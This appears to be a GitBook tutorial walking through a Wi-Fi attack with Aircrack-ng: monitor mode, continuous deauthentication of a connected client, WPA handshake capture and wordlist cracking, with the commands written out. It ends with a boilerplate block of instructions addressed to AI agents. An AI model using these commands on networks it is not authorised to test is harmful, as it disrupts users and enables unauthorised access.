# Aircrack-ng ## Tutorial Video {% embed url="" %} ## Requirements * Wifi adapter that supports monitor mode. * Linux machine or virtual machine. * Aircrack-ng. * List of common passwords. Step 1: Installation ``` sudo apt update sudo apt-get install -y aircrack-ng ``` Step 2: Check available Wi-Fi cards. And disable any processes that may interfere with monitor mode. ``` ip a ```

The internal Wi-Fi card can interfere with the deauth process so we set it to down with this command. ``` sudo ifconfig wlan0 down ``` This command will check any processes that my interfere with our Wi-Fi adapter in monitor mode. ``` sudo airmon-ng check ``` This command then kills any of the processes listed from the command above. ``` sudo airmon-ng check kill ```

Step 3: The next command will set the Wi-Fi adapter into monitor mode. ``` sudo airmon-ng start wlan1 ```

Step 4: Next we want to grab the hex value of our target network. ``` sudo airodump-ng wlan1mon ```

Our hotspot named TestNetwork seems to be operating on channel 6 with the shown mac address. Step 5: Now we only want to listen to devices trying to connect to our target network so we run the following command. ``` sudo airodump-ng -c1 -w capture -d (YOUR TARGET'S HEX VALUE) wlan1mon ```

Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join the network. ``` sudo aireplay-ng --deauth 0 -a (NETWORK HASH) -c (DEVICE HASH) wlan1mon ``` {% hint style="info" %} The network hash is the first BSSID and the device hash is the second listed station. {% endhint %}

Step 7: Once we have captured the wpa handshake we can turn off monitor mode on our adapter and attempt to crack the password using a list of popular used passwords. ``` sudo airmon-ng stop wlan1mon ```

``` sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST DIRECTORY) ``` {% hint style="info" %} Your capture file will be saved to your device. There may be multiple capture files so use the most recent one created. {% endhint %}

Step 8: Congrats!!! 🥳🥳🥳 you have just learned how to use Aircrack-ng to capture and crack a wpa handshake. {% hint style="info" %} I am not liable for any misuse of this knowledge. This tutorial is for educational purposes only. {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://derek-johnson-1.gitbook.io/welcome/projects/aircrack-ng.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.